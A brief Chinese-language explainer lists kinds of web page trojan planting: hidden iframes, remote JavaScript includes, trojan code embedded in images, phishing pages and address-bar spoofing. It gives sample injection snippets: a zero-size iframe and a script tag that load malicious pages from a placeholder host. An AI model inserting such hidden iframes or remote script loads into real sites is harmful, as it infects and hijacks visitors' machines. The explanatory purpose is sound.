网页挂马都有什么类型?
网页挂马就是攻击者通过在正常的页面中(通常是网站的主页)插入一段代码。浏览者在打开该页面的时候,这段代码被执行,然后下载并运行某木马的服务器端程序,进而控制浏览者的主机。网页挂马的类型:
框架嵌入式网络挂马
网页木马被攻击者利用iframe语句,加载到任意网页中都可执行的挂马形式,是最早也是最有效的的一种网络挂马技术。通常的挂马代码如下:
< iframe arc = http://www/xxx/com/muma.html width = 0 height = 0 >< / iframe >
在打开插入该句代码的网页后,就也就打开了
http://www.xxx.com/muma.html
页面,但是由于它的长和宽都为“0”,所以很难察觉,非常具有隐蔽性。js调用型网页挂马
js挂马是一种利用js脚本文件调用的原理进行的网页木马隐蔽挂马技术,如:黑客先制作一个.js文件,然后利用js代码调用到挂马的网页。通常代码如下:
< script language = javascript arc = http://www.xxx.com/gm.js >< / script >
http://www.xxx.com/gm.js
就是一个js脚本文件,通过它调用和执行木马的服务端。这些js文件一般都可以通过工具生成,攻击者只需输入相关的选项就可以了。图片伪装挂马
攻击者利用黑客工具软件将网页中的木马代码植入到图片文件中,再利用代码调用执行,是比较新颖的一种挂马隐蔽方法。
攻击者将类似:
http://www.xxx.com/test.htm
中的木马代码植入到test.gif图片文件中,这些嵌入代码的图片都可以用工具生成,攻击者只需输入相关的选项就可以了。网络钓鱼挂马(也称为伪装调用挂马)
网络中最常见的欺骗手段,黑客们利用人们的猎奇、贪心等心理伪装构造一个链接或者一个网页,利用社会工程学欺骗方法,引诱点击,当用户打开一个看似正常的页面时,网页代码随之运行,隐蔽性极高。这种方式往往和欺骗用户输入某些个人隐私信息,然后窃取个人隐私相关联。
- 伪装挂马
高级欺骗,黑客利用IE或者Fixfox浏览器的设计缺陷制造的一种高级欺骗技术,当用户访问木马页面时地址栏显示用户信任地址,其实却打开了被挂马的页面,从而实现欺骗。